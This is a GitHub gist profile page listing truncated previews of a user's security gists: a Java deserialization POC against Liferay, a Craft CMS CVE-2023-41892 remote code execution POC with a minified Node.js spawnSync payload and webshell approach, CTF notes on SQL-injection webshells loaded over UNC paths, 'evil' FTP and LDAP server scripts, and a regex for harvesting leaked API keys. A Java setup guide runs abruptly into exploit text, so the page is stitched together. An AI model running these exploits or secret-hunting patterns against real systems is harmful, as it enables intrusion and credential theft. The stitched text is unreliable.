Skip to content

Instantly share code, notes, and snippets.

View to016's full-sized avatar
😉

to^ to016

😉
View GitHub Profile
@to016
to016 / java-setup.md
Created December 6, 2022 21:25 — forked from starlinq/java-setup.md
How to install Java JDK8 in Ubuntu 16.04

How to install Java JDK8 in Ubuntu 16.04

Let's consider a JDK8 installation using 2 different versions: default and Oracle. The default version is easiest because it is packaged with Ubuntu.

There is default Java installation called the JDK (Java Development Kit). The JDK is usually only needed if you are going to to do some software developmwent using Java or if some software requires it. The JDK does contain the JRE.

Installing the default JDK

  • Abusing finalize() method (called by garbage collector latter) to exploit java native deserialization (read more here)
  • Affect vulnerable version of liferay whhich used look-ahead object inputstream for checking insecure deserialization (ex: liferay-ce-portal-7.0-ga3)

POC:

import com.sun.media.jai.rmi.ColorModelState;
import com.sun.media.jai.rmi.SampleModelState;
import javassist.ClassPool;
@to016
to016 / http_file_upload_request.txt
Created September 24, 2023 05:39 — forked from rogerz/gist:2988861
File upload HTTP request sample
POST / HTTP/1.1
Host: ec2-23-20-227-204.compute-1.amazonaws.com:3000
Connection: keep-alive
Content-Length: 871
Cache-Control: max-age=0
Origin: http://ec2-23-20-227-204.compute-1.amazonaws.com:3000
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUzEOlJ3ebRFRAGwv
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ec2-23-20-227-204.compute-1.amazonaws.com:3000/
@to016
to016 / CVE-2023-41892-POC.md
Last active October 29, 2024 21:33
CVE-2023-41892 (Craft CMS Remote Code Execution) - POC

This Gist provides a Proof-of-Concept (POC) for CVE-2023-41892, a Craft CMS vulnerability that allows Remote Code Execution (RCE).

Overview

CVE-2023-41892 is a security vulnerability discovered in Craft CMS, a popular content management system. Craft CMS versions affected by this vulnerability allow attackers to execute arbitrary code remotely, potentially compromising the security and integrity of the application.

POC

This POC is depending on writing webshell, so finding a suitable folder with writable permission is necessary.

// Source: https://github.com/nodejs/node/blob/master/lib/child_process.js
// Defines spawn_sync and normalizeSpawnArguments (without error handling). These are internal variables.
spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}
// Defines spawnSync, the function that will do the actual spawning
spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0])
@to016
to016 / ginowar-balsn2023.md
Last active October 11, 2023 05:57
Some notes about ginowa challenge in BalsnCTF 2023

[web] Ginowa

Intended: sqli write webshell kết hợp với mysql trick (dùng @ trong đường dẫn để chỉ định port -> WebDAV via HTTP) access tới webshell thông qua unc path (load_file('\\\\localhost:8080/shell.php'))

Một vài note

When a UNC path is navigated to, the protocol used depends on your provider order. The default Windows configuration will attempt SMB, and then if unavailable, will then attempt WebDAV. Here is the result of running: net use \\173.xxx.xxx.xxx\sdfsdfsdf

image

@to016
to016 / balsn_memes_ftp_server.py
Created October 23, 2023 16:29
A evil ftp server for memes challenge in Balsn CTF 2023
import socket
import os
# Define the server address and port
HOST = '0.0.0.0'
PORT = 2121
DATA_PORT = 61343 # Port for data transfer
# Function to handle USER command
def handle_user(client_socket):
@to016
to016 / evil_ldapServer.java
Last active December 3, 2023 05:58
Art Galery Challenge in WannaGame Championship 2023
import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import org.apache.naming.ResourceRef;
@to016
to016 / Generic keys
Created December 26, 2023 15:59 — forked from h4x0r-dz/Generic keys
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k